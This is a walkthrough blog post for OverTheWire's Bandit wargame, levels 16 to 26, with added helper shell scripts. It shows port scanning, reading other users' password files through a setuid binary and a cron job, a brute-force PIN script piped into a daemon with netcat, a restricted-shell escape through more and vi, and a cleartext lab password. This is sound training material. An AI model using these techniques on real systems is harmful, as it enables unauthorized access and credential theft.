OverTheWire : Bandit

OverTheWire’s Bandit CTF is their lowest level capture the flag, and aimed at more of an intro to capturing the flag. It builds some good fundamentals and gives you hints, articles, and tool suggestions to capture the flag. Each “flag” you capture contains the password to the next level. You start (via SSH) as bandit0, you capture the flag, and that gives you the password to now login again (via ssh) as bandit1. You CTF your way up through level 27! From there you can move on to their next level of challenges.

*As stated in my first post, I decided half way through doing these to start blogging. Maybe at some point I’ll go back through and redo them, but at this point I do not plan on it. Enjoy!


Bandit : Level 16


So building off of level 14, I log in as bandit15 with the previously captured password. Sorry, no cheating here 😉. Reading up using the suggested tips of HEARTBEATING and R BLOCK, I find some interesting stuff.

I connect to the port using openssl.

 openssl s_client -connect melinda.labs.overthewire.org:30001

And as the Level Goal hints, I get HEARTBEATING & R BLOCK at the end of the openssl session. **Hint: once you connect via SSL there are no prompts, but the output appears to stop. Here, paste or enter the previously captured password and hit enter.

A quick Google search of heartbeating returns “OpenSSL HEARTBLEED”, which we all heard so much about the past year or so. From here I stumble upon a blog on how to test for heartbleed. You re-enter the same openssl connect command but add -msg at the end to print the TLS protocol messages, which shows the heartbeat request being sent.

 openssl s_client -connect melinda.labs.overthewire.org:30001 -msg

Running this command returns the following:

So this one did throw me for a loop. I sat and looked here for a good hour. Sad, but true. One of the hints is to use -ign_eof. A quick Google search of that returns 0, yes 0, results. How often does that happen!? So after another long while of sadness, I decided to just google ign and eof separately. Google: linux ign   Google: linux eof.

I knew EOF generally means End Of File, and ign I had no idea about, but the suggested results said “ignore”. None of this made sense and I didn’t know where to use it. On a complete whim I re-ran my OpenSSL command and simply added -ign_eof, and again input the previously captured password (level 14).

openssl s_client -connect melinda.labs.overthewire.org:30001 -ign_eof

The results? I captured the flag, giving me the password to advance to the next level!

Why it works: per the openssl s_client man page, when s_client runs interactively (neither -ign_eof nor -quiet given) a line that begins with certain letters is treated as a connected command instead of being sent to the server: Q closes the connection, R renegotiates, and B sends a heartbeat. The password typed here begins with B, so without -ign_eof the line triggered HEARTBEATING instead of reaching the server. -ign_eof (or -quiet, which implies it) turns those commands off and also keeps the session open after stdin hits end-of-file, so the password is delivered as data and the reply comes back.



Bandit : Level 17


Level Goal

The credentials for the next level can be retrieved by submitting the password of the current level to a port on localhost in the range 31000 to 32000. First find out which of these ports have a server listening on them. Then find out which of those speak SSL and which don’t. There is only 1 server that will give the next credentials, the others will simply send back to you whatever you send to it.

After reading over the Level Goal, I know we need to start with scanning ports. Thanks to my studying of Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, I know this! I’m ready! So I run the following.

nmap -sV melinda.labs.overthewire.org -p 31000-32000

-sV asks nmap to probe each open port and identify the service and version where it can, as opposed to just telling you whether the port is open. The -p tells nmap to only worry about ports in the range 31000-32000. Since the goal says the servers live on localhost, run this from inside the bandit16 SSH session; localhost works in place of the hostname there. Nmap takes a minute to scan and returns the following:

This lets us know that in the range 31000-32000 the ports 31046, 31518, 31691, 31790, and 31960 are open. Unfortunately nmap isn’t able to give us much additional info based on this scan and parameters, but it does tell us that 3 of the ports' services are “echo”, meaning anything we type or throw at them will just be echoed (repeated) back to us. So this narrows it down to 2 ports, 31518 & 31790.

I start by trying to connect via openssl to see if it’s that simple and we just enter our current captured password, as in the previous challenge.

openssl s_client -connect melinda.labs.overthewire.org:31518

It gets to the password prompt!!! I enter the password . . . .and it’s echo’d back to me.

So I try again this time using port 31790, I get a password prompt . . . . and we’re returned a SSH private key!

And thanks to prior exercises, we already know what to do with this! I first find a writeable directory, in my case /tmp/. I create a blank key file via touch bandit17.key and open it with nano. I paste the key contents, save, and quit.

Now admittedly, fresh off the openssl, I attempted to connect and got multiple errors trying to specify the key file, then I remembered the keyfile was specified in the prior CTF with SSH. So I give up on openssl and try via SSH.

ssh -i /tmp/bandit17.key bandit17@melinda.labs.overthewire.o

And it connects, however, it still prompts for a password? So I scroll up and read through the connect messages to see a line that says:

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@ WARNING: UNPROTECTED PRIVATE KEY FILE! @@@@@@@@@@@
Permissions 0664 for ‘/tmp/bandit17.key’ are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
bad permissions: ignore key: /tmp/bandit17.key
bandit17@melinda.labs.overthewire.org’s password:

So I Google “ssl private key permissions too open” which immediately returns this StackOverflow page with a chmod command. So I run:

chmod 400 /tmp/bandit17.key

I rerun my SSH command and specify my new key file, and once again we’re in! Command line confirms we’re bandit17@melinda.
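Both the -ign_eof hunt in level 16 and the scan-then-probe loop here come down to the same two pieces: picking candidate ports out of the nmap output, and pushing a password into a TLS port without s_client swallowing it. The following is an added example of my own, not the post's commands. The nmap output embedded in it is a constructed sample, made up to match the five open ports (three of them echo) the scan above reported; the probe function is meant to be run from the bandit shell and is not exercised here.

```shell
#!/bin/sh
# Constructed sample of `nmap -sV localhost -p 31000-32000` normal output,
# invented for this example to match the scan described in the post.
NMAP_SAMPLE='PORT      STATE SERVICE     VERSION
31046/tcp open  echo
31518/tcp open  ssl/unknown
31691/tcp open  echo
31790/tcp open  ssl/unknown
31960/tcp open  echo'

# candidate_ports: read nmap normal output on stdin and print the open ports
# whose service is not plain echo (echo servers only reflect what we send).
candidate_ports() {
  awk '$2 == "open" && $3 != "echo" { split($1, p, "/"); print p[1] }'
}

# probe_port PORT PASSWORD: open a TLS session to localhost:PORT, send PASSWORD,
# print whatever comes back. -quiet implies -ign_eof: the session stays open after
# stdin ends, and s_client's interactive letter commands (Q, R, B at the start of
# a line) are disabled, so a password beginning with one of them is sent, not
# interpreted. `timeout` is GNU coreutils; drop it where it is not installed.
probe_port() {
  port="$1"
  pass="$2"
  printf '%s\n' "$pass" | timeout 10 openssl s_client -quiet -connect "localhost:$port" 2>/dev/null
}

# Usage on the bandit box (not run here):
#   nmap -sV localhost -p 31000-32000 | candidate_ports | while read -r p; do
#     echo "== port $p"; probe_port "$p" "$(cat /etc/bandit_pass/bandit16)"
#   done
# A port that just returns the password is another echo server; the one that
# answers with an SSH private key is the target.
```

Running the scan through candidate_ports leaves exactly the two ports the post narrowed down to, 31518 and 31790, and the loop in the usage comment does the openssl round trip for each so you do not have to eyeball which one echoed.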



Bandit : Level 18


Level Goal

There are 2 files in the homedirectory: passwords.old and passwords.new. The password for the next level is in passwords.new and is the only line that has been changed between passwords.old and passwords.new

NOTE: if you have solved this level and see ‘Byebye!’ when trying to log into bandit18, this is related to the next level, bandit19

So simple enough? Compare two files and see what I get.

diff passwords.old passwords.new

Comparing the files returns 2 different lines (diff marks the line from passwords.old with < and the one from passwords.new with >, and the > line is the one the goal points at), so I take note of both. Since I had the 2nd one already copied, I attempt to use it and get access denied. I try the first line and receive a “Byebye!” So per the hint, that should mean we’ve completed it and need to move on to the next level.

Bandit : Level 19


Level Goal

The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH.

This one was interesting and taught me something new. So I went to start a new PuTTY session and SSH in as bandit18. This immediately exited the session, which made sense as the previous level (17) said if you’re getting Byebye! move on. So the hint says someone has modified the .bashrc to log you out when you connect via SSH. I immediately look at the .bashrc, and nothing jumps out at me. A quick Google search shows a few posts, one saying “Crap, I put an exit in the bashrc and now cannot login remote.” One user suggested, and apparently it worked for them, that you can CTRL+C during the connection to interrupt the script. But for me it didn’t work, or I wasn’t fast enough.

But scrolling through a bit more I came across this post HERE. The author is asking how to not run the bashrc script when guest users log on, to restrict certain functions. I was assuming this wouldn’t work and also assumed it was a built-in mandatory requirement. Well, to my surprise I was wrong. I went with the second suggested command in the answer and ran:

ssh bandit18@melinda.labs.overthewire.org "bash --noprofile --norc"

Giving ssh a command makes the server run that command instead of starting your interactive login shell, so the interactive bash that would source the booby-trapped .bashrc never starts; --noprofile and --norc additionally tell the new bash not to read any profile or rc files itself. Running the above command left me with no indication of success or failure. I hit enter, which just adds another blank line. So I ran “whoami”

And there we go! Another flag captured.


Bandit : Level 20


Level Goal

To gain access to the next level, you should use the setuid binary in the homedirectory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used the setuid binary.

Level 19, start! I login as bandit19 using the password we just captured. The directions say to use the setuid binary in the home directory. I do an ls, which shows us a “bandit20-do”. I run that:

./bandit20-do
Run a command as another user.
Example: ./bandit20-do id

OK, simple enough? The binary runs whatever command you give it as bandit20, so we can read that user's password file directly even though bandit19 can't.

./bandit20-do cat /etc/bandit_pass/bandit20

And the password is ours!


Bandit : Level 21


Level Goal

There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).

NOTE: To beat this level, you need to login twice: once to run the setuid command, and once to start a network daemon to which the setuid will connect.

NOTE 2: Try connecting to your own network daemon to see if it works as you think

OK . . . I’d be lying if I said I didn’t have to re-read this 100 times. For some reason it just kept going right over my head. I knew I needed to start a listener, but wasn’t sure what I needed to do. Unfortunately, during my Google sessions I stumbled across a very helpful hint. I almost feel guilty about it, so no captured flag man this time.

But in essence you need two PuTTY windows open, and then run the following.

Start a netcat listener on a port of your choice in the first PuTTY session (some netcat builds want the port after -p, i.e. nc -lp 32111).

nc -l 32111

Now run the setuid program in the second, pointing it at that port.

./suconnect 32111

suconnect connects to your listener and reads one line from it. Type the bandit20 password (this level's password) into the nc session and hit enter; if it matches, suconnect sends back the bandit21 password, which shows up in the nc window.


Bandit : Level 22


Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

First thing I did was navigate to /etc/cron.d/ as suggested. I did some reading on the cron manual pages. I did some Google fu on crontab. And then kept it simple. I ran ls -l, which returned a bunch of files, but most importantly I noticed:

-rw-r--r-- 1 root root  61 Nov 14  2014 cronjob_bandit22

And knowing we’re trying to move on to level 22, I figured that’s a good place to start. A quick cat of the cron entry points at the script it runs, and that script contains the following:

#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

So I then ls -l the file, which shows bandit21 (us currently) has permission to read it! Next, a cat of /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv returns the password. (The chmod 644 in the script is what makes this work: the job, running as bandit22, writes bandit22's password into a world-readable file.)

Coming off a cheap victory, an easy one was needed for a small boost of confidence.


Bandit : Level 23


Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.

Based on the provided goal, it seems like we’re headed back to /etc/cron.d. Coming off the last level, I immediately CAT the cronjob_bandit23 (next level) and get:

* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null

Again I CAT the script receiving the following:

bandit22@melinda:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget

Because the level says it’s important to learn to read other people’s scripts, I make sure to thoroughly look it over and understand all the components.

I know the first line is the shebang, which says which interpreter runs the script.

#!/bin/bash

The 2nd line creates the variable $myname from whoami. The catch: the cron entry runs this script as bandit23, so when it fires, $myname is bandit23, not the bandit22 we are logged in as.

myname=$(whoami)

The 3rd line sets the variable $mytarget to an MD5 hash by piping “echo I am user $myname” into md5sum, then cutting the output on the blank space; from the cut manual pages, -f 1 selects the first field, which keeps the hash and drops the trailing filename marker.

mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

Finally, the echo line prints the path the password will be copied to, and the cat line actually writes the password into that file.

echo “Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget”

cat /etc/bandit_pass/$myname > /tmp/$mytarget

Because the job runs as bandit23, the file in /tmp is named after the hash of “I am user bandit23”, and that string hashes the same no matter who computes it. So as bandit22 I run echo I am user bandit23 | md5sum | cut -d ' ' -f 1 myself, cat /tmp/<that hash>, and we have the password; victory is ours!
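The whole level is the observation that the cron entry's user, not your own whoami, decides the file name. The following is an added example of my own (not the level's script): it pulls the user field out of the /etc/cron.d line shown above, reproduces the script's hash step for that user, and returns the /tmp path to cat. The md5 fallback for systems without md5sum is mine as well.

```shell
#!/bin/sh
# cron_user LINE: print the user field of a /etc/cron.d entry
# (fields: minute hour day-of-month month day-of-week USER command ...).
cron_user() {
  printf '%s\n' "$1" | awk '{ print $6 }'
}

# md5_of_stdin: first field of md5sum output; falls back to BSD md5 where
# md5sum is absent (macOS), so the example runs on either.
md5_of_stdin() {
  if command -v md5sum >/dev/null 2>&1; then
    md5sum | cut -d ' ' -f 1
  else
    md5 -q
  fi
}

# target_for USER: the /tmp path cronjob_bandit23.sh writes when it runs as USER.
# Mirrors the script exactly: echo appends a newline, so printf must too.
target_for() {
  hash=$(printf 'I am user %s\n' "$1" | md5_of_stdin)
  printf '/tmp/%s\n' "$hash"
}

# Put it together: take the cron entry's user (not whoami) and derive the path.
password_path_for_cron_entry() {
  target_for "$(cron_user "$1")"
}

# Usage on the bandit box (not run here):
#   entry=$(grep -v '^#' /etc/cron.d/cronjob_bandit23)
#   cat "$(password_path_for_cron_entry "$entry")"
```

Feeding the level's own entry, `* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null`, through password_path_for_cron_entry yields the bandit23 path; computing target_for with your own username instead gives a file that only ever holds your current password, which is the trap the post's first reading of $myname walks into.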


Bandit : Level 24


Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

***Note - I found after spending way too much time on this, there are some issues with this lab. Remember all others using these labs have access and can unfortunately make unwanted changes.

OK, so this one had me stumped! Being a novice at shell scripting but understanding how to script, I figured this would be a piece of cake. Based on previous labs, I know that inside /etc/cron.d there will be some entry for bandit24. Sure enough there was!

I cat the /etc/cron.d/cronjob_bandit24 and get

* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

Which then I take a look at /usr/bin/cronjob_bandit24.sh and get

#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        timeout -s 9 60 "./$i"
        rm -f "./$i"
    fi
done

So taking a look at this script, it changes directories to /var/spool/bandit24 (whoami would produce bandit23 if we ran it, but cron runs it as the bandit24 user). From there it executes every file in that directory as bandit24, killing each one after 60 seconds, and deletes it afterwards.

Going off of previous challenges I write a script in /var/spool/bandit24 called getpass.sh. Inside of getpass.sh I put

#!/bin/bash

cat /etc/bandit_pass/bandit24 >> /tmp/banditpass24/password.txt

I chmod 777 the file and wait for it to run! After a few ls I notice the directory is empty and I navigate to /tmp/banditpass24/password.txt . . . the file is empty. Thinking it was me, I toyed around with this on and off for the past 2 days. After admitting defeat, I looked up the solution.

I was completely surprised to find similar solutions to mine! So I review my original script and run it again, same result. I research other solutions and have the same result with each tutorial I read . . . no password. During one tutorial I actually stumbled across their directory, their script, and their password.txt. I tried their script, renamed the .txt file, and still NO PASSWORD! After more research I finally found a few blog posts where people recently said they’ve had the same issue and reached out to the mods. I jumped on IRC and let them know as well! I feel good knowing my script should have worked, but bummed I spent 2 days on this :\ Oh well!
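One thing worth checking in any setup like the one above, before blaming the lab: the cron job runs getpass.sh as bandit24, so it is bandit24, not bandit23, who has to be able to write the output. A /tmp/banditpass24 directory created by bandit23 with the default umask (755), or a password.txt pre-created with 644, stops the write, and the script is then deleted along with the evidence. The following is an added example of my own, not the post's script: it creates the drop directory and file with permissions the other user can write to, installs the script with its execute bit set (the cron loop runs "./$i" directly, so the shebang and the execute bit both matter), and polls for the result. The test below runs it against a temporary directory; the paths in the usage comment are the level's.

```shell
#!/bin/sh
# setup_drop OUTDIR SPOOLDIR
# Creates OUTDIR and an empty OUTDIR/password.txt that ANY user can write,
# then drops getpass.sh into SPOOLDIR (the /var/spool/bandit24 analogue).
# Cron runs the spool scripts as bandit24 with `timeout -s 9 60 "./$i"`, so:
#   - the script needs its execute bit and a shebang (it is run directly),
#   - the output file and directory must be writable by bandit24, not just by us.
setup_drop() {
  outdir="$1"
  spool="$2"
  mkdir -p "$outdir"
  chmod 777 "$outdir"
  : > "$outdir/password.txt"
  chmod 666 "$outdir/password.txt"
  cat > "$spool/getpass.sh" <<EOF
#!/bin/bash
cat /etc/bandit_pass/bandit24 >> "$outdir/password.txt"
EOF
  chmod 755 "$spool/getpass.sh"
}

# mode_of PATH: the ten-character permission string from ls -ld.
mode_of() {
  ls -ld "$1" | cut -c1-10
}

# wait_for_nonempty FILE [SECONDS]: poll once a second until FILE has content.
# The job fires every minute, so the default 90 s covers a full cycle.
# Returns 1 on timeout so a caller can tell "not yet" from "got it".
wait_for_nonempty() {
  f="$1"
  secs="${2:-90}"
  while [ "$secs" -gt 0 ]; do
    if [ -s "$f" ]; then
      return 0
    fi
    sleep 1
    secs=$((secs - 1))
  done
  return 1
}

# Usage on the bandit box (not run here):
#   setup_drop /tmp/banditpass24 /var/spool/bandit24
#   wait_for_nonempty /tmp/banditpass24/password.txt && cat /tmp/banditpass24/password.txt
```

If the file is still empty after a full cycle, check ls -ld on both the directory and the file as bandit23 and confirm the script has already been removed from the spool (which proves cron picked it up and the failure is on the write side), before assuming the lab itself is broken.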

 


Bandit : Level 25


Level Goal

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

OK, seems easy? All we need to do is use the previous password (check) plus 4 digits 0000 - 9999 (check). So I did take some time to see if there were any tools in Kali or such that would accept the word and add the numbers. I found stuff such as curl, cewl, and others, but figured that was probably more than what this was looking for.

So I decided to write a bash script to do this. Admittedly I struggled with writing this. Coming from a heavy Windows background I knew how batch worked, but couldn’t easily translate that in bash. I’ll have to revisit this in bash.

But, I decided to write the following in Windows.

REM Counter starts at 0 and is incremented before use, so the list runs 1..9999
REM (no 0000) and the numbers are not zero-padded; see the cleanup note below.
set try=0
set pass=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

:LOOP

IF %try%==9999 EXIT

set /a try=%try%+1

REM Append "password pin" to the wordlist, one attempt per line.
echo %pass% %try% >> wordlist.txt

GOTO :LOOP

I then opened the file in Notepad and removed all lines with fewer than 4 digits. I’m sure there are hundreds of other ways, but I didn’t do that this round.

I then created a file in our lab and copied and pasted from my computer to the ssh session into a file called wordlist.txt. Going off of previously learned techniques I used netcat and piped the password file in.

nc melinda.labs.overthewire.org 30002 < wordlist.txt

After a brief moment I was presented with the password.

I’ll have to revisit this when I finish the bandit exercises and and port my batch script to bash. While I still achieved the same goal, what would I have done if I didn’t have access to windows?
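Here is the bash version of that batch loop, as an added example of my own rather than the post's script. It zero-pads the pin with printf, which both gives the daemon the four digits it expects and keeps 0000 through 0999 in the list (trimming the short lines throws away a tenth of the keyspace; the pin just happened not to be there this time). The brute_pin wrapper streams the whole list through a single netcat session, as above. The filter on the daemon's failure replies assumes they contain the word "Wrong", which the page does not show, so adjust it to whatever the daemon actually says; only gen_wordlist is exercised offline.

```shell
#!/bin/sh
# gen_wordlist PASSWORD: print "PASSWORD PIN" for every pin 0000..9999.
# Zero-padding matters: the daemon wants exactly four digits, and dropping
# short numbers silently skips 0000-0999 (a tenth of the keyspace).
gen_wordlist() {
  pass="$1"
  pin=0
  while [ "$pin" -le 9999 ]; do
    printf '%s %04d\n' "$pass" "$pin"
    pin=$((pin + 1))
  done
}

# count_lines: line count without the leading spaces some wc builds print,
# so callers can sanity-check the list size before firing it at the daemon.
count_lines() {
  wc -l | tr -d ' '
}

# brute_pin PASSWORD [HOST] [PORT]: stream the whole list into the daemon over
# one TCP session (one connection, not 10000) and drop the repeated failure lines.
# Assumption (not on the page): the wrong-pin reply contains the word "Wrong".
brute_pin() {
  pass="$1"
  host="${2:-localhost}"
  port="${3:-30002}"
  gen_wordlist "$pass" | nc "$host" "$port" | grep -v -i 'wrong'
}

# Usage on the bandit box (not run here):
#   brute_pin "$(cat /etc/bandit_pass/bandit24)"
# or, to keep the list around for inspection:
#   gen_wordlist "$(cat /etc/bandit_pass/bandit24)" > /tmp/wordlist.txt
#   nc localhost 30002 < /tmp/wordlist.txt
```

Sanity-check the list before sending it: `gen_wordlist x | count_lines` should print 10000, and the first and last lines should be `x 0000` and `x 9999`. Anything else means a pin is missing from the search.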


Bandit : Level 26


Level Goal

Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.

On to the final level! I login as bandit25 and run ls to see what we have. Sure enough we have a bandit26.sshkey in our home directory.

ssh -i bandit26.sshkey bandit26@melinda.labs.overthewire.org

And we’re in!!!!! A few minutes later, I realize I never made it to bandit26: after the SSH login it drops us back down to bandit25. I did some further reading up on scripts and breaking out. I actually found a few things about trying to pause or break the script as it’s running during login, but just as in the last lab, I tried that with no luck.

During research I found that /etc/passwd lists the system's user accounts, including each one's login shell (the last field). So I ran:

cat /etc/passwd | grep bandit26

which returned

bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext

a look at that reveals

bandit25@melinda:~$ cat /usr/bin/showtext
#!/bin/sh

more ~/text.txt
exit 0

To be honest, I had no idea what to do with this information! A google search of more ~/text.txt didn’t return anything. And reading up on more didn’t help. I was familiar with the command but didn’t understand how it played in to this challenge.

After lots of Google searching I stumbled upon a similar challenge which gave me the answer ;( . This has now happened to me twice over the course of these 26 labs, but I can say overall I’m pleased with how I’ve done and have learned quite a bit.

@@@@@@@@@@@@@@@@@@@

SPOILER

@@@@@@@@@@@@@@@@@@@

But I’m assuming if you’re doing these challenges and reading these, you’ve been spoiled all along.

The key to this challenge was to shrink your SSH window down to one or two lines and log in via SSH. With so few rows, more can no longer show all of ~/text.txt at once, so instead of finishing (and reaching the exit 0) it pauses and waits for enter, space, etc. to continue. If you instead hit “v” while more is paused, it opens the file in the editor (vi). Once I got here I was familiar with other commands and ran :r /etc/bandit_pass/bandit26, which reads that file into the buffer and puts the password for the final level on the screen.


Bandit : Review


Overall I was really pleased with these challenges. It definitely built up some skills and got me to look at problems in new ways. And most of all, it got me interested in doing even more challenges like this and attempting challenges such as VMs from vulnhub. I’ll be moving on to Over The Wire’s Natas, which from a brief look appears to be mostly web-based stuff, which I could use some work on as well.

If you’re looking for an easy’ish way to get familiar with navigation and Linux commands, this is a great place to start! The levels are for the most part at a beginner/intro level. They give great hints and really boost your confidence as you move through the levels. It would be great to see them add more to this down the line.

Thanks for following along!